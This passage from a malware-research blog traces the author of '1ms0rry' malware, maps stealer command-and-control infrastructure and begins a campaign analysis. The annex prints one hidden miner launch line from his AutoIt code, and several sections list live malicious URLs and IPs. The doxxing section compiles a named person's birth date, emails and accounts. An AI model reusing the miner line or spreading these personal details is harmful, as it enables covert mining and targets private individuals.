<li><a href="http://telegra.ph/Analiz-skrytogo-majnera-ot-Hawksh-01-01">http://telegra.ph/Analiz-skrytogo-majnera-ot-Hawksh-01-01</a></li>
<li><a href="http://telegra.ph/Pishem-DDOS-bota-na-C-CHast-1-02-04">http://telegra.ph/Pishem-DDOS-bota-na-C-CHast-1-02-04</a></li>
<li><a href="http://telegra.ph/Analiz-stillera-ot-xZist-01-06">http://telegra.ph/Analiz-stillera-ot-xZist-01-06</a></li>
<li><a href="http://telegra.ph/Pishem-loader-s-avtoudaleniem-na-C-01-09">http://telegra.ph/Pishem-loader-s-avtoudaleniem-na-C-01-09</a></li>
<li><a href="http://telegra.ph/Analiz-majnera-ot-EgorSa1dy-02-22">http://telegra.ph/Analiz-majnera-ot-EgorSa1dy-02-22</a></li>
</br></br>
<h4>Forks</h4>
Some Fork example:</br>
<li>FelixHTTP (N0f1l3 fork):</li>
Ref:</br>
<a href="https://twitter.com/siri_urz/status/974205197407932416">https://twitter.com/siri_urz/status/974205197407932416</a></br>
40089ea9af2c1191fd9dfec5c49d1c37809b9eae8609bcaa810346e81ca3384a</br>
freexmr.ru</br></br>
<center><a href="https://i.imgur.com/NJtXnBn.jpg"><img src="https://i.imgur.com/NJtXnBn.jpg" height=500px /></a></center><br>
<center><a href="https://i.imgur.com/PWymTDY.jpg"><img src="https://i.imgur.com/PWymTDY.jpg" height=500px/></a></center><br>
</br>
<li>BUMBLEBEE MinerPanel:</li>
Ref:</br>
<a href="https://twitter.com/malwrhunterteam/status/956155159469608960">https://twitter.com/malwrhunterteam/status/956155159469608960</a></br>
ih803741.myihor.ru</br></br>
<center><a href="https://i.imgur.com/DVpOqq3.jpg"><img src="https://i.imgur.com/DVpOqq3.jpg" height=500px/></a></center><br>
<center><a href="https://i.imgur.com/yCXVQOb.jpg"><img src="https://i.imgur.com/yCXVQOb.jpg" height=500px/></a></center><br>
<center><a href="https://i.imgur.com/WVXdSnb.jpg"><img src="https://i.imgur.com/WVXdSnb.jpg" height=500px/></a></center><br>
</br>
<li>EnlightenedHTTP</li>
Ref:</br>
<a href="https://twitter.com/ViriBack/status/962051515526520832">https://twitter.com/ViriBack/status/962051515526520832</a></br>
179.43.147.227/mine/</br>
v90327ux.beget.tech</br>
1754d64016c758a65cb85df328ffd502a7255a6855d976e3bdeb497f95201848</br>
<center><a href="https://i.imgur.com/qUKNU5s.jpg"><img src="https://i.imgur.com/qUKNU5s.jpg" height=500px /></a></center><br>
<li>Evrial</li>
Evrial (<a href="https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/">https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/</a>) use code from 1ms0rry for sure:</br>
<center><a href="https://i.imgur.com/Sd0PU23.png"><img src="https://i.imgur.com/Sd0PU23.png" height=700px/></a></center>
</br>
<h2>Who is 1MS0RRY ? </h2>
Now let's try to understand who is 1ms0rry.</br>
We know that he as :
<ul>
<li>a Twitter account: <a href="https://twitter.com/ims0rry_off">https://twitter.com/ims0rry_off</a></li>
<center><a href="https://twitter.com/ims0rry_off/status/978657619790499840"><img src="https://i.imgur.com/fct7uZZ.png" height=650px/></a></center>
<li>a Telegram account: <a href="https://t.me/ims0rryblog">https://t.me/ims0rryblog</a></li>
<center><img src="https://i.imgur.com/YuGH4Ac.png"/></center>
<li>a Github account: <a href="https://github.com/ims0rry/">https://github.com/ims0rry/</a></li>
<center><a href="https://twitter.com/ims0rry_off/status/960872074502918145"><img src="https://i.imgur.com/S0FFQHL.png" /></a></center>
</ul>
Let's try to get the nickname and the email used to commit in the Github account.</br></br>
This command gives us (full details in the annex section):
<ul>
<li>gornostay322@mail.ru</li>
<li>lordatsa@mail.ru</li>
<li>your_email@whatever.com</li>
</ul>
with the nicknames:
<ul>
<li>Gatsoev</li>
<li>hype</li>
<li>ims0rry</li>
<li>s0rry</li>
<li>Your Name</li>
</ul>
lordatsa@mail.ru give us a mail.ru account <a href="https://my.mail.ru/mail/lordatsa/photo">https://my.mail.ru/mail/lordatsa/photo</a></br>
<center><a href="https://i.imgur.com/NyzRQBs.png"><img src="https://i.imgur.com/NyzRQBs.png" height=400px /></a></center></br>
We now have a name Аца Гацоев (Atsa Gatsoev)
</br>
All these information help us to find this Weblancer profile: <a href="https://www.weblancer.net/users/hypega">https://www.weblancer.net/users/hypega</a>/</br>
<center><a href="https://i.imgur.com/lr480wC.png"><img src="https://i.imgur.com/lr480wC.png" height=400px /></a></center></br>
This profile is interesting because:
<ul>
<li>the name Ацамаз Гацоев (Atsamaz Gatsoev) is the same as the mail.ru account</li>
<li>The username used is hypega. hype was used to commit on github, hypega for "hypeGatsoev</li>
<li>The personal website in the profils information is <a href="http://lordatsa.wix.com/gatsoevsummary">http://lordatsa.wix.com/gatsoevsummary</a> lordatsa is used as username for mail.ru</li>
</ul>
<a href="http://lordatsa.wix.com/gatsoevsummary">http://lordatsa.wix.com/gatsoevsummary</a> is also interesting:</br>
<center><a href="https://i.imgur.com/FRK5V9h.png"><img src="https://i.imgur.com/FRK5V9h.png" height=400px /></a></center></br>
<ul>
<li>VK Account: <a href="https://vk.com/quiet_and_invisible">https://vk.com/quiet_and_invisible</a></li>
<li>G+ account: <a href="https://plus.google.com/u/0/109976643017066209762/">https://plus.google.com/u/0/109976643017066209762/posts/p/pub</a></li>
</ul>
the VK account looks down but the photos in the G+ account points to 1ms0rry again:
<center><a href="https://i.imgur.com/bVIxKDp.png"><img src="https://i.imgur.com/bVIxKDp.png"></a></center></br>
The G+ account allows us to switch to the related Youtube account:</br>
<center><a href="https://i.imgur.com/GvfCTRa.png"><img src="https://i.imgur.com/GvfCTRa.png" height=400px /></a></center></br>
Now, take a deeper look at this video <a href="https://youtu.be/zPRo3hkVbrQ?t=4">https://youtu.be/zPRo3hkVbrQ?t=4</a> </br>
<center><a href="https://i.imgur.com/aSCCZoV.jpg"><img src="https://i.imgur.com/aSCCZoV.jpg" height=400px /></a></center></br>
This directory [NEW] builder on the desktop reminds us LoaderBot pdb :</br>
<code>c:\Users\gorno\Desktop\[NEW] builder\Bot\Miner\obj\Release\LoaderBot.pdb</code> </br>
</br>
In <a href="https://youtu.be/KUvLk20-NZk?t=6">https://youtu.be/KUvLk20-NZk?t=6</a> at 6sec we can see Thermida and a local path C:\Users\gorno</br>
<center><a href="https://i.imgur.com/oTxOvCQ.png"><img src="https://i.imgur.com/oTxOvCQ.png" height=400px/></a></center></br>
In <a href="https://www.youtube.com/watch?v=KUvLk20-NZk">https://www.youtube.com/watch?v=KUvLk20-NZk</a> at 1 sec we can see the viruscheckmate user wich is hypega (again)
<center><a href="https://i.imgur.com/sWs3z7M.png"><img src="https://i.imgur.com/sWs3z7M.png" height=250px/></a></center>
His freelancer account is interesting too, <a href="https://freelance.ru/hypega">https://freelance.ru/hypega</a>.</br>
it allows us to retrieve 2 links:
</br>
* A Portfolio website: <a href="http://lordatsa.wix.com/e-consultant">lordatsa.wix.com/e-consultant</a> (via <a href="https://freelance.ru/hypega/elektronny-konsultant-2810410.html">https://freelance.ru/hypega/elektronny-konsultant-2810410.html</a>)
</br>
* A GitHub account: <a href="https://github.com/Gatsoev/Nerve_MobileApp">github.com/Gatsoev/Nerve_MobileApp</a> (via <a href="https://freelance.ru/hypega/pr-agent-2966193.html">https://freelance.ru/hypega/pr-agent-2966193.html</a>)
</br>
This Github account is a perfect proof. </br>
Let's take a look a for example <a href="https://github.com/Gatsoev/csgo.tm-fakeSellExtension">https://github.com/Gatsoev/csgo.tm-fakeSellExtension</a>.</br>
<center><img src="https://i.imgur.com/bPOF7vU.png"></center>
</br>
Curious isn't it ? It looks like the Github account was just renamed.
</br>
We now have enough proof for linking 1ms0rry to Ацамаз Гацоев / Atsamaz Gatsoev</br></br>
Who the hell is Atsamaz Gatsoev?
We can find a protential picture of him in his <a href="https://www.weblancer.net/users/hypega">weblancer profile </a> : </br>
<center><a href="https://i.imgur.com/fjWDYee.png"><img src="https://i.imgur.com/fjWDYee.png" height=400px/></a></center></br></br>
Confirmed by Alan Salbiev from Education Ministry on a <a href="https://www.facebook.com/alansalbiev/posts/1663614260360099">Facebook post</a>.</br>
Alan Salbiev describes 1ms0rry like that:</br>
<center><a href="https://i.imgur.com/ObDsPFt.png"><img src="https://i.imgur.com/ObDsPFt.png" height=500px></a></center></br>
Google translate:</br>
<pre>
Atsamaz Gatsoev.
11-grad student from Vladikavkaz.
He ran and published in his blog theme more than 20 research papers in the field of information security, in particular, virology,
namely: analysis of protection and opening of various vredosnogo software, methods of cyber attacks and protecting against them.
Over 1,400 people signed it.
December 2-3, 2017 in Vladikavkaz was held the first hackathon among high school students for the prize of the Head of the Republic
in which Atsamaz acted as a mentor.
Atsamaz he organized and conducted twice a thematic Olympiad on CTF (Capture the flag) of information security in the format Task-based,
which was attended by over 100 people from different cities and countries.
In addition, with the direct participation Atsamaz (design, commissioning and start-up) in the work of our Office has been implemented
application based on the principles of distributed data registry (blokcheyn - technology)
February 25, 2018 at competitions on sports hacking at the University ITMO our hero confidently walked rivals from Komsomolsk-on-Amur,
Khanty-Mansiysk, Penza, Pyatigorsk, etc. As a result, a schoolboy from Vladikavkaz entered the top 15 in St. Petersbur>.
At Atsamaz there is a dream - to enter the University of ITMO. Our Office will provide every possible assistance to a talented guy.
Special mention should be noted that the successes Atsamaz lies the great work of his parents, who were able to instill in him the
awareness, independence, the desire for knowledge and hard work. Take an example from them.
</pre>
</br>
It's easy to protect against malware when you develop them, isn't it ?</br>
TL;DR:</br>
(We only keep information related to his malware activities.)</br>
</br>
Name: Ацамаз Гацоев, Atsamaz Gatsoev, </br>
Born: 1997 Aug. 14</br>
Location: Tskhinvali region </br>
Nickname: 1ms0rry, gorno, hypega, Gatsoev, lordatsa, atsam;</br>
Email: lordatsa@mail.ru gornostay322@mail.ru</br>
Social: https://vk.com/quiet_and_invisible https://twitter.com/ims0rry_off https://github.com/ims0rry/ https://plus.google.com/u/0/109976643017066209762/
</br>
There is enough information for knowing exactly who is 1ms0rry :)</br></br>
<h2>Conclusion</h2>
Obviously, this write-up doesn't cover every malware (you can find some telegra.ph bot) but it's enough data if somebody needs to go deeper.
</br>
<center><img src="https://i.imgur.com/Pcv65cs.gif"/></center>
</br>
This is not a major threat actor, malware developed by him are not really advanced and the web panels are basic (except the design !) but the SorryCoin backend was interesting.
</br>
It is obvious that here, Ацамаз Гацоев is a malware developer/reseller and not a researcher or a red-teamer that develops malware for POC purpose.
</br>
Just in case of, we archived all the links (forum, twitter, telegraph...) on archive.org :).
</br>
That all folks! </br>
We hope you enjoy the read if you need more information don't hesitate to ping us</br>
Thanks again to MalwareMustDie and sS.! for the awesome work and greetz to NibbleHunter</br></br>
<h3>Related works</h3>
<a href="https://go.recordedfuture.com/hubfs/reports/cta-2017-1011.pdf">https://go.recordedfuture.com/hubfs/reports/cta-2017-1011.pdf</a></br>
<a href="https://0btemos.blogspot.dk/2018/02/analyzed-bot-1ms0rry.html">https://0btemos.blogspot.dk/2018/02/analyzed-bot-1ms0rry.html</a></br>
</br>
<h3>Annexe</h3>
<h4>Github Information</h4>
<li>Commit nickname:email by repository</li>
<iframe src="https://pastebin.com/embed_iframe/pfmprDZg/noheader" style="border:none;width:100%"></iframe>
<li>lordatsa mail address:</li>
<code>
Hawksh-miner/CPU PUBLIC/CommonRes/32_unpacked_.au3:
Run("Cheking.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u
lordatsa@mail.ru" & $rand & " -p x " & $threads, "", @SW_HIDE)
</code>
<li>Different user path found on the Github</li>
<iframe src="https://pastebin.com/embed_iframe/Bbuf9kLZ/noheader" style="border:none;width:100%"></iframe>
</br>
<li>1ms0rry posts</li>
<iframe src="https://pastebin.com/embed_iframe/a0YzQTwQ/noheader" style="border:none;width:100%"></iframe>
Benkow_http://www.blogger.com/profile/00709869309686004611noreply@blogger.comtag:blogger.com,1999:blog-330713861169915021.post-65850315638769848572017-12-27T08:06:00.001-08:002017-12-27T11:40:33.657-08:00Another normal day in cybercrime: from a random Loki sample to 550 C&CHi,</br>
</br>
These weeks, I wanted to spend time on Maltego for testing this amazing tool but for that, I needed something to study.</br>
As usual, when I'm in this case, I took a look at <a href="http://cybercrime-tracker.net" >CCT</a> for interesting stuff.</br>
<center><img src="https://i.imgur.com/ChB4DMa.png" /></center></br>
</br>
7 malicious domains on the same IP 195.14.105.12. VirusTotal Passive dns report 56 malicious domains: it looks perfect for Maltego.</br>
The game here is to collect as much as possible linked C&C via:
<ul>
<li>Passive DNS</li>
<li>Malware analysis</li>
<li>Registrant Emails reuse</li>
</ul>
And of course, without false positive or unrelated servers. I have try to not going earlier than 2016.</br>
</br>
I will show you in this blogpost how some random malware campaigns, like Pony or Loki, are finally connected on each others. This is quick notes about a very big network.</br>
<center><iframe src="https://giphy.com/embed/atQBbRUX3JOGA" width="480" height="271" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center>
</br>
I've try to do my best to collect as much info as possible but I know that this blogpost is only a little part of a really big infrastructure. I'm publishing them in case of they are useful to somebody.</br>
<h1>Malware reminding</h1>
A quick reminding about the malware we will discuss in this Article.
<ul>
<li>Pony - Password stealer <a href="http://www.xylibox.com/2013/05/pony-19-win32fareit.html">[1]</a> <a href="https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/">[2]</a> <a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1558">[3]</a></li>
<li>Loki - Password stealer <a href="https://phishme.com/loki-bot-malware/">[1]</a> <a href="https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850">[2]</a></li>
<li>KeyBase - Pasword Stealer <a href="https://researchcenter.paloaltonetworks.com/2015/06/keybase-keylogger-malware-family-exposed/">[1]</a></li>
<li>AgentTesla - Passwors Stealer <a href="https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr">[1]</a></li>
<li>BetaBot - Multi purpose (DDoS, formgrabber, loader...) <a href="http://resources.infosecinstitute.com/beta-bot-analysis-part-1/">[1]</a> <a href="http://resources.infosecinstitute.com/beta-bot-analysis-part-2/">[2]</a> <a href="http://www.xylibox.com/2015/04/betabot-retrospective.html">[3]</a></li>
<li>Atmos - Banking trojan (Zeus fork) <a href="https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-ice-419.pdf">[1]</a> <a href="http://blog.malwaremustdie.org/2016/06/mmd-0054-2016-atmos-botnet-and-facts.html">[2]</a> <a href="https://cybercrime-tracker.net/ccam.php">[3]</a></li>
<li>DiamondFox - Multi purpose (pwd stealer, POS, wallet stealer, loader...) <a href="https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/">[1]</a> <a href="https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/">[2]</a></li>
<li>JackPOS - Point of Sales <a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/JackPOS-%E2%80%93-The-House-Always-Wins/">[1]</a>
<a href="https://www.defcon.org/images/defcon-22/dc-22-presentations/McGrew/DEFCON-22-Wesley-McGrew-Instrumenting-Point-of-Sale-Malware-WP.pdf">[2]</a></li>
<li>LiteHTTP - Loader <a href="https://github.com/zettabithf/LiteHTTP">[1]</a></li>
<li>QuantLoader - Loader <a href="https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground">[1]</a></li>
<li>ZyklonHTTP - Multi purpose (DDoS, Loader, pwd stealer...) <a href="https://security.radware.com/ddos-threats-attacks/threat-advisories-attack-reports/zyklon-http-botnet/">[1]</a> <a href="http://blog.talosintelligence.com/2017/05/modified-zyklon-and-plugins-from-india.html">[2]</a></li>
</ul>
This is the typical <strike>asshole</strike> cybercrime starter kit. All these tools are open source or really easy to crack and are badly detected by Antivirus industry.
</br>
<h1>Infrastructure</h1>
<center><img src="https://i.imgur.com/mRTjCri.png" /></center></br>
</br>
<center><iframe src="https://giphy.com/embed/3ohc0YyGLVb3lBjoSQ" width="480" height="242" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center>
<center><a href="http://benkow.cc/8287e89c7fb96aa02065b8fb0596795d01d959d6ae1f972db4188e52726aaaaa.mtgl">The Maltego base is available here</a></center>
Like every Maltego noob, I have firstly use a lot all the transforms on all the domains but after some hours, my graph was full of false positive. Some binaries are contacting whatsmyip, Gmail or Yahoo, some domains was legit in 2012 but not in 2016 etc.</br>
I have erased all the data and start again from zero but this time I have spent time on each domain and IP to be sure to not include bullshits.</br>
After some hours of work, I've obtained this typology.</br>
The little circle is composed of all the interconnected elements (IP, domains, emails or hashes) and the biggest circle are composed of "final-IOC" (CNC url, hashes or emails).</br>
I have found:
<ul>
<li>116 IPs - <a href="https://pastebin.com/PtdQrZC8">Full list</a></li>
<li>485 domains - <a href="https://pastebin.com/pKwjFazb">Full list</a></li>
<li>53 Registrants emails - <a href="https://pastebin.com/PXzHNaSR">Full list</a></li>
<li>548 identified C&C (web panels) - (full list below)</li>
<li>160 Hashes</li>
</ul>
There are some nodes dedicated for phishing, others for malware spreading, others for malware c&c etc.
</br>
The huge majority of IPs are located to RU as usual (keep in mind that RU IP != RU actors ;) )</br>
<center><img src="https://i.imgur.com/sURPuuk.png" height=600px/></center></br>
</br>
If we look at the top 5 five of most connected element we can found:
<ul>
<li>42.112.16.179</li>
<li>91.224.23.174</li>
<li>46.173.219.193 </li>
<li>42.112.16.178 </li>
<li>hdfc.pp.ru </li>
</ul>
hdfc.pp.ru is a good domain for discovering a lot of other IPs. This domain was configured on 49 different IPs in 1 year. It was known for hosting CNCs like Atmos, Pony or Lokibot. (<a href="https://twitter.com/Techhelplistcom/status/780893577157095424">[1]</a><a href="https://twitter.com/Antelox/status/811302669029670912">[2]</a>)</br>
</br>
Another interesting pivot: if you look at the domains connected to our initial IP (195.14.105.12) a domain, vividerenaz.com, was registered by abuse@domainprovider.work. This email is a valid email used by crooks for spreading mainly phishing but some malware too. Techhelplist has reported a lot a IP and domains related to <a href="https://twitter.com/Techhelplistcom/status/849980278806388737">this email</a></br>
</br>
I have try to find information on campaigns that used these domains. This is a quick list:
<ul>
<li><a href="https://isc.sans.edu/forums/diary/Email+attachment+using+CVE20178759+exploit+targets+Argentina/22850/">Email attachment using CVE-2017-8759 exploit targets Argentina</a></li>
<li><a href="http://blog.talosintelligence.com/2017/03/threat-roundup-0324-0331.html">Threat Round-up for Mar 24 - Mar 31</a></li>
<li><a href="http://www.malware-traffic-analysis.net/2016/07/13/index.html">2016-07-13 - NEUTRINO EK DATA DUMP WITH "JUICYLEMON" BANDARCHOR</a></li>
<li><a href="https://www.ransecurity.com/?p=1042">ATENCIÓN! Intento de estafa mediante un phishing AFIP (ARGENTINA)</a></li>
<li><a href="http://www.clearskysec.com/leetmx/">LeetMX – a Yearlong Cyber-Attack Campaign Against Targets in Latin America</a></li>
<li><a href="http://www.malware-traffic-analysis.net/2017/06/12/index5.html">2017-06-12 - HANCITOR MALSPAM (DOCUSIGN-THEMED)</a></li>
<li><a href="http://www.malware-traffic-analysis.net/2017/06/15/index2.html">2017-06-15 - HANCITOR MALSPAM (GOOGLE DOCS-THEMED)</a></li>
<li><a href="https://brica.de/alerts/alert/public/1170845/heads-up-lokibot-endpoints-loki-c2s/">Heads-Up - LokiBot Endpoints - loki c2s</a></li>
<li><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-11882-exploited-deliver-cracked-version-loki-infostealer/">CVE-2017-11882 Exploited to Deliver a Cracked Version of the Loki Infostealer</a></li>
<li><a href="https://securelist.com/neutrino-modification-for-pos-terminals/78839/">Neutrino modification for POS-terminals</a></li>
<li><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit42-stegbaus-because-sometimes-xor-just-isnt-enough/">StegBaus: Because Sometimes XOR Just Isn’t Enough</a></li>
<li><a href="http://www.malware-traffic-analysis.net/2017/04/05/index.html">2017-04-05 - TERROR EK SENDS ANDROMEDA</a></li>
<li><a href="https://researchcenter.paloaltonetworks.com/2017/07/unit42-emea-bi-monthly-threat-reports-turkey-saudi-arabia-united-arab-emirates/">EMEA Bi-Monthly Threat Reports: Turkey, Saudi Arabia & United Arab Emirates</a></li>
<li><a href="https://www.zscaler.com/blogs/research/increase-jrat-campaigns">Increase in jRAT Campaigns</a></li>
</ul>
It look like there is a many actors using these domains, from Hancitor gang to Nigerian scammer. It is possible that this infrastructure is rent somewhere in a market.</br>
</br>
<h1>Malware</h1>
Here we go for the panels list.</br>
I have only keep the most common families, you can found the full details in the Maltego base.
<h2>Pony</h2>
<iframe src="https://pastebin.com/embed_iframe/8Pw0S52k" style="border:none;width:100%"></iframe>
<h2>LokiBot</h2>
<iframe src="https://pastebin.com/embed_iframe/aeVTMfxn" style="border:none;width:100%"></iframe>
<h2>Atmos</h2>
<iframe src="https://pastebin.com/embed_iframe/zLkTSmsX" style="border:none;width:100%"></iframe>
<h2>BetaBot</h2>
<iframe src="https://pastebin.com/embed_iframe/kyam1t6c" style="border:none;width:100%"></iframe>
<h2>KeyBase</h2>
<iframe src="https://pastebin.com/embed_iframe/6e4y841k" style="border:none;width:100%"></iframe>
<h2>AgentTesla</h2>
<iframe src="https://pastebin.com/embed_iframe/cx1sKcMw" style="border:none;width:100%"></iframe>
<h2>DiamondFox</h2>
<iframe src="https://pastebin.com/embed_iframe/d1P2N3Nb" style="border:none;width:100%"></iframe>
<h2>ZyklonHTTP</h2>
<iframe src="https://pastebin.com/embed_iframe/Vt1gUnQv" style="border:none;width:100%"></iframe>
In the Maltego database you can also found some JackPOS, neutrino, QuantLoader, Btc miner, LiteHTTP, Java RAT...</br>
This all these data I have tried to identify groups by url patterns. I have used the dirty way: I have converted the URL list in csv (by replacing / by ;) and sorted the result by directories.</br>
</br>
For example: this actor seems to be in the passwords stealing business. Pony and Loki are a close couple in many campaigns.</br>
<pre>
Loki,http://street-upp.ru/v1/fre.php Loki,http://street-ups.ru/v3/fre.php
Pony,http://street-upp.ru/v6/gate.php Pony,http://street-ups.ru/v2/admin.php
Pony,http://street-upp.ru/v7/gate.php Loki,http://street-men.ru/v3/fre.php
Pony,http://street-mens.ru/v1/gate.php Loki,http://street-men.ru/v4/fre.php
Pony,http://street-mens.ru/v2/gate.php Pony,http://street-men.ru/mmb/gate.php
Loki,http://street-takeover.ru/okeagwu/fre.php Pony,http://street-men.ru/vpoli/gate.php
Pony,http://street-takeover.ru/v1/admin.php Loki,http://fyzeeconnect.ru/hthththththththht/Panel/five/fre.php
Loki,http://street-wise.ru/v2/fre.php Loki,http://fyzeeconnect.ru/kingofkings/Panel/five/fre.php
Loki,http://street-wise.ru/v3/fre.php Loki,http://fyzeeconnect.ru/my-friend/fre.php
Loki,http://street-wise.ru/v4/fre.php Loki,http://fyzeeconnect.ru/street-credibilty/fre.php
Loki,http://street-wise.ru/v5/fre.php Loki,http://fyzeeconnect.ru/street-takeover/fre.php
Loki,http://street-wise.ru/v6/fre.php Loki,http://fyzeeconnect.ru/street-wise/fre.php
Loki,http://street-ups.ru/v3/fre.php Pony,http://fyzeeconnect.ru/debbyrisingsun/gate.php
Pony,http://street-ups.ru/v2/admin.php Pony,http://fyzeeconnect.ru/maliki/gate.php
Loki,http://street-men.ru/v3/fre.php Pony,http://fyzeeconnect.ru/v5/gate.php
Loki,http://street-men.ru/v4/fre.php Loki,http://fyzeeconnect.ru/street-credibilty/fre.php
Pony,http://street-men.ru/mmb/gate.php Loki,http://fyzeeconnect.ru/street-takeover/fre.php
Pony,http://street-men.ru/vpoli/gate.php Loki,http://fyzeeconnect.ru/street-wise/fre.php
Loki,http://fyzeeconnect.ru/hthththththththht/Panel/five/fre.php Pony,http://fyzeeconnect.ru/debbyrisingsun/gate.php
Loki,http://fyzeeconnect.ru/kingofkings/Panel/five/fre.php Pony,http://fyzeeconnect.ru/maliki/gate.php
Loki,http://fyzeeconnect.ru/my-friend/fre.php Pony,http://fyzeeconnect.ru/v5/gate.php
</pre>
</br>
Another actor targeting Argentina with BetaBot and Atmos:
<pre>
BetaBot,http://av.bitdefenderesupdate.ru/.av/logout.php
Atmos,http://chester.agenteinformaticos.ru/.scnerio/chusma/tetris.php?m=login
Unknown,http://update.agenteinformaticos.ru/.coma/update/panel
</pre>
There is a lot of different actors with different goals in this infra. We can found a looooot of Nigerian actors, a little bit of ransomware, some banking gang or a little bit of point of sales malware gang...</br>
You can found some emails related here: <a href="https://pastebin.com/PXzHNaSR">https://pastebin.com/PXzHNaSR</a>
<h1>Misc</h1>
Thanks to all these data, we can found funny related stuff related to our infrastructure:</br>
<ul>
<li>
This is a guy asking for help on Whois and take his malicious domain ("adtogroups.com", related to Atmos, Pony or Btc Miner) as example <a href="https://serverfault.com/questions/841799/discrepancy-in-ns-information-between-dig-and-whois/841816">[1]</a> in march <a href="http://linux.cloudypoint.com/forums/topic/networking-solved-discrepancy-in-ns-information-between-dig-and-whois/">[2]</a> in April</li>
<li>A very strange website that post every week a list of domains related to our infrastructure <a href="http://www.hiperinfo.ru/news/domeny_sajty_otzyvy_zhaloby_rekomendacii_razmestit_podat_objavlenie_24_12_2017/2017-12-26-3712">[1]</a> </li>
<li>A guy on Hackforum seems pwn his clients with something that contacts "tierastyle.co.uk" <a href=" https://hackforums.net/showthread.php?tid=5507958&page=3">[1]</a></li>
<li>They like using obvious domains name like lokibotnet.ru, lokivshulk.info, atmosbot.xyz, achakeybase.com.de or azumebot.ru</li>
<li>One of our botmaster seems to have problems with a car <a href="http://www.nairaland.com/306281/free-honda-radio-unlock-codes/38#8282568">[1]</a></li>
<li>Another one use his emails for registering malicious domains and for Linkedin (slyovic84@yahoo.com)<a href="https://www.linkedin.com/in/victor-ifeanyi-obasoanya-31800bab/">[1]</a></li>
</ul>
<center><iframe src="https://giphy.com/embed/14ea2sihlSXiaA" width="480" height="360" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center></br>
<h1>Conclusion</h1>
All these elements remind me a malware infrastructure as service. It's a good entry point for a lot of investigations :D</br>
Thanks to Maltego, after this quick test, I'm a big fan :D</br>
I only have make retro hunting, so quite everything here are known. With a little bit of active hunting, I'm sure you can found double or triple the number panels. I saw new domains every day</br>
</br>
</br>
Good luck and happy hunting :)Benkow_http://www.blogger.com/profile/00709869309686004611noreply@blogger.comtag:blogger.com,1999:blog-330713861169915021.post-73073818850277696202017-12-10T08:40:00.000-08:002017-12-12T09:37:23.363-08:00An inside view of a password stealer campaignHi,</br>
After a lightning talks at botconf 2017 I'll try to describe here the full story behind the fav.al malware campaign.</br>
This is not something new, after looking at this internet I've found an <a href="https://blog.fortinet.com/2016/05/06/new-fareit-variant-analysis">article</a> about this case in 2016 but I cannot find any article about the big picture of this case. So, here we go</br>
</br>
<center><iframe src="https://giphy.com/embed/abDTQHKU9knUA" width="480" height="271" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center></br>
This is a verrrrry classic case in cyber crime. During the last 5 years I've seen a lot of cases like this one.
</br>
<h1>Starting line</h1>
By looking on public sandboxes I have found a recurrent domain hosting Agent Tesla panel:</br>
<pre>
[+] 1eb54cd95709b62ebafa50b5dc051a41225b1de236bf8d269ceeac1087f9fbb1 POST -> t4st.fav.al/st/post.php
[+] 78ca1db4616ac10d6ae34a9f8b85b63966fad43fed0f40cf61d9fcde74892d94 POST -> t2st.fav.al/st/post.php
</pre>
<a href="https://blog.fortinet.com/2016/05/06/new-fareit-variant-analysis">fav.al</a> is known since almost May 2016 for hosting Pony Formbook or Agent Tesla on many different sub domains.</br>
Before giving details on the infrastructure, a quick reminder about the malware used:</br>
<table border=1>
<tr>
<td>Family</td>
<td>Method</td>
<td>Gate</td>
<td>UserAgent</td>
</tr>
<tr>
<td>Pony</td>
<td>POST</td>
<td>gate.php</td>
<td><pre>Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)</pre></td>
</tr>
<tr>
<td>Agent Tesla</td>
<td>POST</td>
<td>post.php</td>
<td><pre>Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)</pre></td>
</tr>
<tr>
<td>Form Book</td>
<td>GET / POST</td>
<td>config.php?id= / config.php</td>
<td><pre>Mozilla Firefox/4.0</pre></td>
</tr>
</table>
Those malware are designed to crawls the victim computer and search for saved credentials like FTP, RDP, Email, web sites... in Browser, registry, config files ...</br>
Some good analyzes:</br>
<b>Pony:</b></br>
<ul>
<li><a href="https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/">No money, but Pony! From a mail to a trojan horse</a></li>
<li><a href="http://www.xylibox.com/2013/05/pony-19-win32fareit.html">Pony 1.9 (Win32/Fareit)</a></li>
<li><a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1558">KernelMode thread</a></li>
</ul>
</br></br>
<b>Agent Tesla:</b></br>
<ul>
<li><a href="https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr">In-Depth Analysis of A New Variant of .NET Malware AgentTesla</a></li>
</ul>
</br></br>
<b>FormBook:</b></br>
<ul>
<li><a href="https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/" >The Formidable FormBook Form Grabber</a></li>
<li><a href="https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html">Significant FormBook Distribution Campaigns Impacting the U.S. and South Korea</a></li>
</ul>
</br>
